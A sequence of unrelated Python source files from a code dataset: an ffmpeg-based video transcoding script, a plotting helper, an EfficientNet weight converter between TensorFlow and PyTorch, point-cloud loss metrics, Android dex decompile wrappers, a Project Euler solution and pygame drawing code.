-b:a {} {}'.format(vidFile, \n # file_descriptors[\"videoBitRate\"], file_descriptors[\"frameRate\"], \n # file_descriptors[\"resolution\"], file_descriptors[\"aspectRatio\"], \n # file_descriptors['audioBitRate'],file_descriptors[\"file_name\"])\n #command = 'ffmpeg -i {} -s 320x240 -aspect 4:3 -r 15 -c:v libx264 -c:a aac -b:a 384k {}'.format(\n\n command = \"ffmpeg -i {} -r {} {}\".format(\n vidFile, \n file_descriptors['frameRate'],\n file_descriptors[\"file_name\"])\n\n proc = subprocess.run([command], shell=True, stdout=subprocess.PIPE)\n return file_descriptors\n\ndef generateMPEG2(aviFileDescriptor):\n bit_rate = aviFileDescriptor[\"MaxRate\"] #int(aviFileDescriptor[\"videoBitRate\"])\n max_rate = aviFileDescriptor[\"MaxRate\"]\n min_rate = aviFileDescriptor[\"MaxRate\"] #aviFileDescriptor[\"audioBitRate\"]\n m2v_name = os.path.splitext(aviFileDescriptor[\"file_name\"])[0] + \".m2v\"\n\n # if os.path.exists(mpeg2_filename):\n # subprocess.run(['rm', 'mpeg2_filename'], stdout = subprocess.PIPE, stderr = stdout)\n #-r {} -filter:v 'setpts={}*PTS' -filter:a 'atempo=2'\n command = \"ffmpeg -i {} -an -s {} -deinterlace -aspect {} \" \\\n \"-filter:v 'setpts={}*PTS' \" \\\n \"-f yuv4mpegpipe - | yuvdenoise | ffmpeg -i - -an -vcodec \" \\\n \"mpeg2video -f mpeg2video -b:v {} -maxrate {} -minrate {} \" \\\n \"-bf 2 -bufsize 1343488 {}\".format(\n aviFileDescriptor[\"file_name\"], \n aviFileDescriptor[\"resolution\"],\n aviFileDescriptor[\"aspectRatio\"],\n aviFileDescriptor[\"pts\"],\n bit_rate, max_rate, \n min_rate, m2v_name)\n \n proc = subprocess.run(command,shell=True, stdout=subprocess.PIPE)\n return m2v_name\n\ndef generateVideoPES(mp2filename):\n mp2_name = mp2filename\n pes_filename = os.path.splitext(mp2_name)[0] + \".pes\"\n command = \"esvideompeg2pes {} > {}\".format(mp2_name,pes_filename)\n proc = subprocess.run(command, shell=True, stdout=subprocess.PIPE)\n\n return pes_filename\n\ndef generateVideoTS(aviFileDescriptor, pes_name): \n ts_filename = os.path.splitext(pes_name)[0] + \".ts\" \n vid_bit_rate = aviFileDescriptor['MaxRate']* (1 + 0.15)\n \n command = \"pesvideo2ts 2065 {} 112 {} 0 {} > {}\".format(\n aviFileDescriptor['frameRate'],\n vid_bit_rate, \n pes_name, \n ts_filename )\n\n proc = subprocess.run(command, shell=True, stdout=subprocess.PIPE)\n\n return ts_filename, vid_bit_rate\n\ndef extractAudioToMp2(aviFileDescriptor):\n avi_name = aviFileDescriptor['file_name']\n audio_mp2_name = os.path.splitext(vidFile)[0] + \"_audio\" + \".mp2\"\n audio_sampling_rate = \"48k\" #aviFileDescriptor[\"audioSamplingRate\"]\n audio_bitrate = \"128k\" #aviFileDescriptor[\"audioBitRate\"] \n temp = 1\n\n print(audio_sampling_rate, audio_bitrate)\n\n print(\"extracting audio....: {}\".format(audio_sampling_rate))\n command = \"ffmpeg -i {} -vn -ac 2 -acodec mp2 -f mp2 -filter:a 'atempo={}' -b:a {} -ar {} {}\".format(\n avi_name,\n temp,\n audio_bitrate, \n audio_sampling_rate, \n audio_mp2_name )\n \n subprocess.run(command, shell = True, stdout = subprocess.PIPE)\n return audio_mp2_name\n\n\ndef getAudioFrameSize(audioFileName):\n audioDescriptor = {}\n command = \"esaudioinfo \" + audioFileName\n proc = subprocess.run(command, shell=True, stdout = subprocess.PIPE)\n shell_output = proc.stdout.decode()\n all_test = shell_output.split(\"\\n\\n\")\n final_result = all_test.pop()\n final_result = all_test.pop()\n final_result = all_test.pop()\n final_result = all_test.pop()\n print(final_result)\n try:\n x,y = re.search(\"\\d+Hz\", final_result).span()\n 
audioDescriptor[\"sampling_rate\"] = final_result[x:y-2]\n except:\n pass\n try:\n x,y = re.search(\"\\d+\\sbytes\", final_result).span()\n audioDescriptor[\"frame_size\"] = final_result[x:y-6]\n except:\n pass\n print(audioDescriptor)\n return audioDescriptor\n\ndef generateAudioPES(audio_mp2_name, audioDescriptor):\n audio_framesize = audioDescriptor['frame_size']\n audio_sampling_rate = audioDescriptor['sampling_rate'] \n audio_pes_name = os.path.splitext(vidFile)[0] + \"_audio\" + \".pes\"\n pts_step = ()\n\n command = \"esaudio2pes {} 1152 {} {} -1 3600 > {}\".format(\n audio_mp2_name,\n audio_framesize,\n audio_sampling_rate,\n audio_pes_name )\n\n subprocess.run(command, shell = True, stdout = subprocess.PIPE)\n return audio_pes_name\n\ndef generateAudioTS(audio_pes_name, audioDescriptor):\n audio_sampling_rate = audioDescriptor['sampling_rate'] \n audio_ts_name = os.path.splitext(vidFile)[0] + \"_audio\" + \".ts\"\n\n command = \"pesaudio2ts 2075 1152 {} {} 0 {} > {}\".format(\n audio_sampling_rate, \n audioDescriptor['frame_size'],\n audio_pes_name,\n audio_ts_name )\n\n subprocess.run(command, shell = True, stdout = subprocess.PIPE)\n return audio_ts_name, 188000 # refer to avalpa manual\n\ndef muxTS():\n command = \"tscbmuxer b:{} sample.ts b:{} \"\nif __name__ == \"__main__\":\n vidFile = sys.argv[1]\n ocdir_rate = int(sys.argv[2])\n\n vid_ids = getVideoID(vidFile) #working\n aviFileDescriptor = generateAVI(vid_ids) #working\n mp2FileName = generateMPEG2(aviFileDescriptor) #working\n\n\n pes_name = generateVideoPES(mp2FileName) \n video_ts_name, video_ts_bitrate = generateVideoTS(aviFileDescriptor,pes_name)\n \n\n audio_mp2_name = extractAudioToMp2(aviFileDescriptor)\n audioDescriptor = getAudioFrameSize(audio_mp2_name)\n\n audio_pes_name = generateAudioPES(audio_mp2_name, audioDescriptor)\n print(\"generate audio ts\")\n audio_ts_name, audio_ts_bitrate = generateAudioTS(audio_pes_name, audioDescriptor)\n\n\n\n\n\n\n\n\n","repo_name":"robot-1/vidtots","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":7926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2045790919","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef bar_anal(bitcoin):\n plt.xticks(())\n plt.yticks(())\n bar_cnt = np.arange(7)\n dic = ['mean', 'std', 'var', 'min', 'max', 'argmin', 'argmax']\n Y = np.array([np.mean(bitcoin), np.std(bitcoin), np.var(bitcoin), np.min(bitcoin), np.max(bitcoin), np.argmin(bitcoin), np.argmax(bitcoin)])\n plt.bar(bar_cnt, Y, facecolor = '#9999ff', edgecolor = 'white')\n for x, y in zip(bar_cnt, Y):\n plt.text(x + 0.4, y +0.05, '%s : %.2f' %(dic[x] ,y), ha = 'center', va = 'bottom')\n plt.show()\n\n","repo_name":"loserofeverything/mcm_day01","sub_path":"myplot.py","file_name":"myplot.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"42201621345","text":"import os\n\nimport tensorflow as tf\nimport torch\n\nfrom deepvision.layers import fused_mbconv\nfrom deepvision.layers import mbconv\nfrom deepvision.layers.fused_mbconv import __FusedMBConvPT\nfrom deepvision.layers.fused_mbconv import __FusedMBConvTF\nfrom deepvision.layers.mbconv import __MBConvPT\nfrom deepvision.layers.mbconv import __MBConvTF\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import (\n EfficientNetV2B0,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import 
(\n EfficientNetV2B1,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import (\n EfficientNetV2B2,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import (\n EfficientNetV2B3,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import EfficientNetV2L\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import EfficientNetV2M\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import EfficientNetV2S\nfrom deepvision.models.classification.efficientnet.efficientnetv2_pt import (\n EfficientNetV2PT,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2_tf import (\n EfficientNetV2TF,\n)\n\nMODEL_ARCHITECTURES = {\n \"EfficientNetV2B0\": EfficientNetV2B0,\n \"EfficientNetV2B1\": EfficientNetV2B1,\n \"EfficientNetV2B2\": EfficientNetV2B2,\n \"EfficientNetV2B3\": EfficientNetV2B3,\n \"EfficientNetV2S\": EfficientNetV2S,\n \"EfficientNetV2M\": EfficientNetV2M,\n \"EfficientNetV2L\": EfficientNetV2L,\n}\n\nMODEL_BACKBONES = {\"tensorflow\": EfficientNetV2TF, \"pytorch\": EfficientNetV2PT}\n\n\ndef load_tf_to_pt(\n filepath,\n dummy_input,\n kwargs=None,\n freeze_bn=True,\n):\n \"\"\"\n Basic usage:\n\n ```\n dummy_input_tf = tf.ones([1, 224, 224, 3])\n dummy_input_torch = torch.ones(1, 3, 224, 224)\n\n tf_model = deepvision.models.EfficientNetV2B0(include_top=False,\n pooling='avg',\n input_shape=(224, 224, 3),\n backend='tensorflow')\n\n tf_model.save('effnet.h5')\n\n from deepvision.models.classification.efficientnet import efficientnet_weight_mapper\n pt_model = efficientnet_weight_mapper.load_tf_to_pt(filepath='effnet.h5', dummy_input=dummy_input_tf)\n\n print(tf_model(dummy_input_tf)['output'].numpy())\n print(pt_model(dummy_input_torch).detach().cpu().numpy())\n # True\n np.allclose(tf_model(dummy_input_tf)['output'].numpy(), pt_model(dummy_input_torch).detach().cpu().numpy())\n \"\"\"\n with torch.no_grad():\n # Temporarily need to supply this as custom_objects() due to a bug while\n # saving Functional Subclassing models\n model = tf.keras.models.load_model(\n filepath, custom_objects={\"EfficientNetV2TF\": EfficientNetV2TF}\n )\n # Run dummy_input through the model to initialize\n # model.variables\n model(dummy_input)\n\n model_config = model.get_config()\n target_model = EfficientNetV2PT(\n include_top=model_config[\"include_top\"],\n classes=model_config[\"classes\"],\n input_shape=tf.transpose(tf.squeeze(dummy_input), (2, 0, 1)).shape,\n pooling=model_config[\"pooling\"],\n width_coefficient=model_config[\"width_coefficient\"],\n depth_coefficient=model_config[\"depth_coefficient\"],\n blockwise_kernel_sizes=model_config[\"blockwise_kernel_sizes\"],\n blockwise_num_repeat=model_config[\"blockwise_num_repeat\"],\n blockwise_input_filters=model_config[\"blockwise_input_filters\"],\n blockwise_output_filters=model_config[\"blockwise_output_filters\"],\n blockwise_expand_ratios=model_config[\"blockwise_expand_ratios\"],\n blockwise_se_ratios=model_config[\"blockwise_se_ratios\"],\n blockwise_strides=model_config[\"blockwise_strides\"],\n blockwise_conv_type=model_config[\"blockwise_conv_type\"],\n )\n # Copy stem\n target_model.stem_conv.weight.data = torch.nn.Parameter(\n torch.from_numpy(tf.transpose(model.layers[1].kernel, (3, 2, 0, 1)).numpy())\n )\n # Copy BatchNorm\n target_model.stem_bn.weight.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[2].gamma.numpy())\n )\n target_model.stem_bn.bias.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[2].beta.numpy())\n 
)\n target_model.stem_bn.running_mean.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[2].moving_mean.numpy())\n )\n target_model.stem_bn.running_var.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[2].moving_variance.numpy())\n )\n\n tf_blocks = [\n block\n for block in model.layers\n if isinstance(block, __FusedMBConvTF) or isinstance(block, __MBConvTF)\n ]\n\n for pt_block, tf_block in zip(target_model.blocks, tf_blocks):\n if isinstance(tf_block, __FusedMBConvTF):\n converted_block = fused_mbconv.tf_to_pt(tf_block)\n pt_block.load_state_dict(converted_block.state_dict())\n if isinstance(tf_block, __MBConvTF):\n converted_block = mbconv.tf_to_pt(tf_block)\n pt_block.load_state_dict(converted_block.state_dict())\n\n target_model.top_conv.weight.data = torch.nn.Parameter(\n torch.from_numpy(\n tf.transpose(\n model.layers[-5 if model_config[\"include_top\"] else -4].kernel,\n (3, 2, 0, 1),\n ).numpy()\n )\n )\n if model_config[\"include_top\"]:\n # Copy top BatchNorm\n target_model.top_bn.weight.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-4].gamma.numpy())\n )\n target_model.top_bn.bias.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-4].beta.numpy())\n )\n target_model.top_bn.running_mean.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-4].moving_mean.numpy())\n )\n target_model.top_bn.running_var.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-4].moving_variance.numpy())\n )\n\n # Copy head\n target_model.top_dense.weight.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-1].kernel.numpy().transpose(1, 0))\n )\n target_model.top_dense.bias.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-1].bias.numpy())\n )\n\n \"\"\"\n As noted in: https://discuss.pytorch.org/t/out-of-memory-error-when-resume-training-even-though-my-gpu-is-empty/30757/5\n Sometimes, on some devices, PyTorch-based networks throw a CUDA OOM when loaded directly on the GPU. 
To avoid this,\n we now *save* the model and load it back, mapping to the CPU and then pushing back to the original model device.\n \"\"\"\n device = target_model.device\n original_filepath = os.path.splitext(filepath)[0]\n target_model.to(\"cpu\")\n torch.save(target_model.state_dict(), f\"converted_{original_filepath}.pt\")\n\n target_model.load_state_dict(\n torch.load(f\"converted_{original_filepath}.pt\", map_location=\"cpu\"),\n )\n target_model.to(device)\n target_model.zero_grad()\n\n if freeze_bn:\n # Freeze all BatchNorm2d layers\n for module in target_model.modules():\n if isinstance(module, torch.nn.BatchNorm2d):\n module.eval()\n module.weight.requires_grad = False\n module.bias.requires_grad = False\n\n return target_model\n\n\ndef load_pt_to_tf(\n filepath,\n dummy_input,\n kwargs=None,\n architecture=None,\n freeze_bn=True,\n):\n \"\"\"\n Basic usage:\n\n ```\n dummy_input_tf = tf.ones([1, 224, 224, 3])\n dummy_input_torch = torch.ones(1, 3, 224, 224)\n\n pt_model = deepvision.models.EfficientNetV2B0(include_top=False,\n pooling='avg',\n input_shape=(3, 224, 224),\n backend='pytorch')\n torch.save(pt_model.state_dict(), 'effnet.pt')\n\n from deepvision.models.classification.efficientnet import efficientnet_weight_mapper\n\n kwargs = {'include_top': False, 'pooling':'avg', 'input_shape':(3, 224, 224)}\n tf_model = efficientnet_weight_mapper.load_pt_to_tf(filepath='effnet.pt',\n architecture='EfficientNetV2B0',\n kwargs=kwargs,\n dummy_input=dummy_input_torch)\n\n\n pt_model.eval()\n print(pt_model(dummy_input_torch).detach().cpu().numpy())\n print(tf_model(dummy_input_tf)['output'].numpy())\n # True\n np.allclose(tf_model(dummy_input_tf)['output'].numpy(), pt_model(dummy_input_torch).detach().cpu().numpy())\n ```\n \"\"\"\n\n if kwargs is None:\n raise ValueError(\n f\"'kwargs' cannot be None, and are required for PyTorch model construction.\"\n )\n if architecture is None:\n raise ValueError(\n f\"'architecture' cannot be None, and is required for PyTorch model construction.\"\n )\n with torch.no_grad():\n model = MODEL_ARCHITECTURES.get(architecture)\n model = model(backend=\"pytorch\", **kwargs)\n model.load_state_dict(torch.load(filepath))\n\n model_config = model.get_config()\n target_model = EfficientNetV2TF(\n include_top=model_config[\"include_top\"],\n classes=model_config[\"classes\"],\n input_shape=dummy_input.squeeze(0).permute(1, 2, 0).shape,\n pooling=model_config[\"pooling\"],\n width_coefficient=model_config[\"width_coefficient\"],\n depth_coefficient=model_config[\"depth_coefficient\"],\n blockwise_kernel_sizes=model_config[\"blockwise_kernel_sizes\"],\n blockwise_num_repeat=model_config[\"blockwise_num_repeat\"],\n blockwise_input_filters=model_config[\"blockwise_input_filters\"],\n blockwise_output_filters=model_config[\"blockwise_output_filters\"],\n blockwise_expand_ratios=model_config[\"blockwise_expand_ratios\"],\n blockwise_se_ratios=model_config[\"blockwise_se_ratios\"],\n blockwise_strides=model_config[\"blockwise_strides\"],\n blockwise_conv_type=model_config[\"blockwise_conv_type\"],\n )\n dummy_input = tf.convert_to_tensor(\n dummy_input.permute(0, 2, 3, 1).detach().cpu().numpy()\n )\n # Run dummy_input through the model to initialize\n # model.variables\n target_model(dummy_input)\n\n # Copy stem\n target_model.layers[1].kernel.assign(\n tf.convert_to_tensor(\n model.stem_conv.weight.data.permute(2, 3, 1, 0).detach().cpu().numpy()\n )\n )\n\n # Copy BatchNorm\n target_model.layers[2].gamma.assign(\n 
tf.convert_to_tensor(model.stem_bn.weight.data.detach().cpu().numpy())\n )\n\n target_model.layers[2].beta.assign(\n tf.convert_to_tensor(model.stem_bn.bias.data.detach().cpu().numpy())\n )\n\n target_model.layers[2].moving_mean.assign(\n tf.convert_to_tensor(model.stem_bn.running_mean.data.detach().cpu().numpy())\n )\n\n target_model.layers[2].moving_variance.assign(\n tf.convert_to_tensor(model.stem_bn.running_var.data.detach().cpu().numpy())\n )\n\n tf_blocks = [\n block\n for block in target_model.layers\n if isinstance(block, __FusedMBConvTF) or isinstance(block, __MBConvTF)\n ]\n\n for tf_block, pt_block in zip(tf_blocks, model.blocks):\n if isinstance(pt_block, __FusedMBConvPT):\n converted_block = fused_mbconv.pt_to_tf(pt_block)\n tf_block.set_weights(converted_block.weights)\n if isinstance(pt_block, __MBConvPT):\n converted_block = mbconv.pt_to_tf(pt_block)\n tf_block.set_weights(converted_block.weights)\n\n target_model.layers[-5 if model_config[\"include_top\"] else -4].kernel.assign(\n tf.convert_to_tensor(\n model.top_conv.weight.data.permute(2, 3, 1, 0).detach().cpu().numpy()\n )\n )\n\n if model_config[\"include_top\"]:\n # Copy top BatchNorm\n target_model.layers[-4].gamma.assign(\n tf.convert_to_tensor(model.top_bn.weight.data.detach().cpu().numpy())\n )\n\n target_model.layers[-4].beta.assign(\n tf.convert_to_tensor(model.top_bn.bias.data.detach().cpu().numpy())\n )\n\n target_model.layers[-4].moving_mean.assign(\n tf.convert_to_tensor(\n model.top_bn.running_mean.data.detach().cpu().numpy()\n )\n )\n\n target_model.layers[-4].moving_variance.assign(\n tf.convert_to_tensor(\n model.top_bn.running_var.data.detach().cpu().numpy()\n )\n )\n\n # Copy head\n target_model.layers[-1].kernel.assign(\n tf.convert_to_tensor(\n model.top_dense.weight.data.permute(1, 0).detach().cpu().numpy()\n )\n )\n\n target_model.layers[-1].bias.assign(\n tf.convert_to_tensor(model.top_dense.bias.data.detach().cpu().numpy())\n )\n\n if freeze_bn:\n # Freeze all BatchNorm2d layers\n for layer in target_model.layers:\n if isinstance(layer, tf.keras.layers.BatchNormalization):\n layer.trainable = False\n\n return target_model\n","repo_name":"DavidLandup0/deepvision","sub_path":"deepvision/models/classification/efficientnet/efficientnet_weight_mapper.py","file_name":"efficientnet_weight_mapper.py","file_ext":"py","file_size_in_byte":13908,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"16"} +{"seq_id":"39343165280","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom geomloss import SamplesLoss\n\nimport open3d as o3d\n\n\ndef chamfer_distance(x, y):\n x_ = torch.unsqueeze(x, dim=1)\n y_ = torch.unsqueeze(y, dim=2)\n distances = torch.sum((x_ - y_)**2, dim=3)\n # print(distances.shape)\n # print(torch.min(distances, dim=2)[1].shape)\n chamfer = torch.mean(torch.min(distances, dim=1)[0], dim=1) + torch.mean(torch.min(distances, dim=2)[0], dim=1)\n # print(chamfer.shape)\n return chamfer\n\n\ndef earth_mover_distance(x, y):\n bs, num_points_x, points_dim = x.size()\n _, num_points_y, _ = y.size()\n batch_EMD = 0\n # 近似计算\n L = SamplesLoss(loss='sinkhorn', p=1, blur=.05)\n for i in range(bs):\n loss = L(x[i], y[i])\n batch_EMD += loss\n emd = batch_EMD / bs\n return emd\n\n\nclass ChamferDistance(nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, xyz1, xyz2):\n \"\"\"\n Args:\n xyz1: tensor with size of (B, N, 3)\n xyz2: tensor with size of (B, M, 3)\n \"\"\"\n cd = chamfer_distance(xyz1, xyz2)\n # print(cd)\n 
return cd\n # return torch.from_numpy(cd)\n\n\nclass EarthMoverDistance(nn.Module):\n def __init__(self):\n # super().__init__()\n super(EarthMoverDistance, self).__init__()\n\n def forward(self, xyz1, xyz2):\n \"\"\"\n Args:\n xyz1: tensor with size of (B, N, 3)\n xyz2: tensor with size of (B, M, 3)\n \"\"\"\n emd = earth_mover_distance(xyz1, xyz2)\n return emd\n\n\nCD = ChamferDistance()\nEMD = EarthMoverDistance()\n\n\ndef cd_loss(pcs1, pcs2):\n \"\"\"\n L1 Chamfer Distance.\n\n Args:\n pcs1 (torch.tensor): (B, N, 3)\n pcs2 (torch.tensor): (B, M, 3)\n \"\"\"\n return torch.mean(CD(pcs1, pcs2))\n\n\ndef emd_loss(pcs1, pcs2):\n \"\"\"\n EMD Loss.\n\n Args:\n pcs1 (torch.Tensor): (B, N, 3)\n pcs2 (torch.Tensor): (B, N, 3)\n \"\"\"\n return torch.mean(EMD(pcs1, pcs2))\n\n\n\nclass ChamferLoss(nn.Module):\n\n def __init__(self):\n super(ChamferLoss, self).__init__()\n self.use_cuda = torch.cuda.is_available()\n\n def forward(self, preds, gts):\n P = self.batch_pairwise_dist(gts, preds)\n mins, _ = torch.min(P, 1)\n loss_1 = torch.sum(mins)\n mins, _ = torch.min(P, 2)\n loss_2 = torch.sum(mins)\n\n return loss_1 + loss_2\n\n def batch_pairwise_dist(self, x, y):\n bs, num_points_x, points_dim = x.size()\n _, num_points_y, _ = y.size()\n xx = torch.bmm(x, x.transpose(2, 1))\n yy = torch.bmm(y, y.transpose(2, 1))\n zz = torch.bmm(x, y.transpose(2, 1))\n if self.use_cuda:\n dtype = torch.cuda.LongTensor\n else:\n dtype = torch.LongTensor\n diag_ind_x = torch.arange(0, num_points_x).type(dtype)\n diag_ind_y = torch.arange(0, num_points_y).type(dtype)\n # brk()\n rx = xx[:, diag_ind_x, diag_ind_x].unsqueeze(1).expand_as(zz.transpose(2, 1))\n ry = yy[:, diag_ind_y, diag_ind_y].unsqueeze(1).expand_as(zz)\n P = (rx.transpose(2, 1) + ry - 2 * zz)\n\n return P\n\nCD2 = ChamferLoss()\n\n\nclass Fs(nn.Module):\n def __init__(self):\n # super().__init__()\n super(Fs, self).__init__()\n\n def forward(self, xyz1, xyz2, th):\n \"\"\"\n Args:\n xyz1: tensor with size of (B, N, 3)\n xyz2: tensor with size of (B, M, 3)\n \"\"\"\n return self.t_f_s(xyz1, xyz2, th)\n\n def f_score(self, x, y, th=0.01):\n bs, num_points_x, points_dim = x.size()\n _, num_points_y, _ = y.size()\n batch_f = 0\n\n for i in range(bs):\n pred, gt = x[i].detach().cpu().numpy(), y[i].detach().cpu().numpy()\n # pred, gt = x[i].cpu().numpy(), y[i].cpu().numpy()\n # pred, gt = x[i], y[i]\n\n pred = o3d.geometry.PointCloud(o3d.utility.Vector3dVector(pred))\n gt = o3d.geometry.PointCloud(o3d.utility.Vector3dVector(gt))\n\n dist1 = pred.compute_point_cloud_distance(gt)\n dist2 = gt.compute_point_cloud_distance(pred)\n\n recall = float(sum(d < th for d in dist2)) / float(len(dist2))\n precision = float(sum(d < th for d in dist1)) / float(len(dist1))\n\n loss = 2 * recall * precision / (recall + precision) if recall + precision else 0\n\n batch_f += loss\n\n return torch.tensor(batch_f / bs)\n\n def t_f_s(self, x, y, th=0.1):\n bs, num_points, points_dim = x.size()\n\n x_ = torch.unsqueeze(x, dim=1)\n y_ = torch.unsqueeze(y, dim=2)\n distances = torch.sum((x_ - y_) ** 2, dim=3)\n # print(distances.shape)\n # print(torch.min(distances, dim=2)[1].shape)\n # chamfer = torch.mean(torch.min(distances, dim=1)[0], dim=1) + torch.mean(torch.min(distances, dim=2)[0], dim=1)\n\n d1 = torch.min(distances, dim=1)[0]\n d2 = torch.min(distances, dim=2)[0]\n\n d1[torch.where(d1.le(th))] = 0\n # d1[torch.where(d1.gt(th))] = 1\n\n d2[torch.where(d2.le(th))] = 0\n # d2[torch.where(d2.gt(th))] = 1\n\n chamfer = torch.mean(d1, dim=1) + torch.mean(d2, dim=1)\n\n 
return chamfer\n\n d1 = torch.sum(d1, dim=1)\n\n d2 = torch.sum(d2, dim=1)\n\n # return (d1.le(th).sum() + d2.le(th).sum()) / (2*bs*num_points)\n\n # d1.le(th).sum() + d2.le(th).sum()\n # print(d1.shape)\n\n # print(d1+d2)\n # print(2*num_points-(d1+d2))\n\n return torch.mean(d1+d2) / (2*num_points)\n\n\n\nfs = Fs()\n\n\ndef fs_loss(xyz1, xyz2, th):\n\n return torch.mean(fs(xyz1, xyz2, th))\n\n\n\nif __name__ == '__main__':\n\n pc1 = torch.rand(2, 2048, 3)\n pc2 = torch.rand(2, 2048, 3)\n\n print(fs(pc1, pc2, 0.001))\n\n\n import open3d as o3d\n\n source_points = pc1.numpy()[0]\n target_points = pc2.numpy()[0]\n\n print(source_points.shape)\n\n source = o3d.geometry.PointCloud()\n source.points = o3d.utility.Vector3dVector(source_points)\n\n target = o3d.geometry.PointCloud()\n target.points = o3d.utility.Vector3dVector(target_points)\n\n\n dist1 = source.compute_point_cloud_distance(target)\n dist2 = target.compute_point_cloud_distance(source)\n print(np.array(dist1).shape)\n\n print(source_points)\n print(target_points)\n\n print(np.array(dist1))\n print(np.array(dist2))\n\n print((np.mean(np.array(dist1)**2) + np.mean(np.array(dist2)**2)))\n\n print(CD2(pc1, pc2))\n\n print(CD2(pc1, pc2).item()/2048)\n\n print(cd_loss(pc1, pc2).item())\n # print(emd_loss(pc1, pc2))]\n\n","repo_name":"Miss-wzx/UPCC","sub_path":"metrics/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29355518274","text":"import os\nimport shutil\nimport subprocess\nfrom dexsim.settings import JAVA_PATH, BAKSMALI_PATH, SMALI_PATH, FILTERS_LIST\n\n\ndef baksmali(dex_file, output_dir='out'):\n \"\"\"\n dex to smali\n \"\"\"\n cmd = '{} -jar {} d {} -o {}'.format(JAVA_PATH, BAKSMALI_PATH, dex_file, output_dir)\n print(cmd)\n\n subprocess.call(cmd, shell=True)\n\n for line in FILTERS_LIST:\n clz = line.split('#')[0]\n xpath = output_dir + os.sep + clz.replace('.', os.sep).strip('\\n')\n if os.path.exists(xpath):\n shutil.rmtree(xpath)\n\n return output_dir\n\n\ndef smali(smali_dir, output_file='out.dex'):\n \"\"\"\n smali to dex\n \"\"\"\n cmd = '{} -jar {} a {} -o {}'.format(JAVA_PATH,SMALI_PATH, smali_dir, output_file)\n print(cmd)\n\n subprocess.call(cmd, shell=True)\n\n return output_file\n\n","repo_name":"0x90/dexsim","sub_path":"dexsim/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"35816637154","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef calculate(m):\n for i in reversed(range(0,len(m)-1)):\n for j in range(0,len(m[i])):\n d = max(m[i+1][j], m[i+1][j+1])\n m[i][j] += d\n return m[0][0]\n\ndef read_file(s):\n f = open(s)\n line = f.readline()\n m = []\n while line:\n m.append(list(map(int,line.split(' '))))\n line = f.readline()\n f.close()\n return m\n\nm = read_file(\"18.txt\")\n\nprint(calculate(m))\n","repo_name":"PandaDrunkard/proex","sub_path":"euler/0/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74209548488","text":"import pygame\nfrom pygame.draw import *\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nSUN_BORDER = (255, 255, 128)\nSUN_COLOR = (255, 255, 192)\nSKY = (0, 255, 255)\nWATER = (22, 80, 68)\nGRAY = (32, 32, 32)\n\n\ndef draw_sun(x, y, r):\n line(screen, SUN_COLOR, (x - r, y), (x + r, y), r // 10)\n 
line(screen, SUN_COLOR, (x, y - r), (x, y + r), r // 10)\n circle(screen, SUN_BORDER, (x, y), r // 10, 0)\n circle(screen, SUN_BORDER, (x, y), r, r // 10)\n\n\ndef draw_hole(surface, x, y, r):\n s = (1 - r // abs(r)) // 2\n r0 = abs(r)\n\n ellipse(surface, GRAY, [x - (5 * r) // 2 + 5 * r * s, y - (3 * r0) // 4, 5 * r0, (11 * r0) // 8], 0)\n ellipse(surface, WATER, [x - 2 * r + 4 * r * s, y - r0 // 2, 4 * r0, r0], 0)\n\n\ndef draw_ear(surface, x, y, r):\n s = (1 - r // abs(r)) // 2\n r0 = abs(r)\n\n circle(surface, WHITE, (x, y), r0, 0)\n circle(surface, BLACK, (x, y), r0, 1)\n rect(surface, WHITE, [x - r // 2 + (3 * r * s) // 2, y, (3 * r0) // 2, r0], 0)\n\n\ndef draw_head(surface, x, y, r):\n s = (1 - r // abs(r)) // 2\n r0 = abs(r)\n\n ellipse(surface, WHITE, [x + 6 * r * s, y, 6 * r0, 3 * r0], 0)\n ellipse(surface, BLACK, [x + 6 * r * s, y, 6 * r0, 3 * r0], 1)\n\n # mouth\n ellipse(surface, BLACK, [x + 3 * r + (5 * r * s) // 2, y + 2 * r0, (5 * r0) // 2, (2 * r0) // 5], 1)\n rect(surface, WHITE, [x + 3 * r + (5 * r * s) // 2, y + 2 * r0, (5 * r0) // 2, r0 // 5], 0)\n\n # eyes\n circle(surface, BLACK, (x + 5 * r, y + r0), r0 // 5, 0)\n circle(surface, BLACK, (x + 3 * r + r // 2, y + r0), r0 // 5, 0)\n\n draw_ear(surface, x + r, y + (3 * r0) // 5, (3 * r) // 5)\n\n\ndef draw_bear(surface, x, y, r):\n # in case r is negative:\n s = (1 - r // abs(r)) // 2\n r0 = 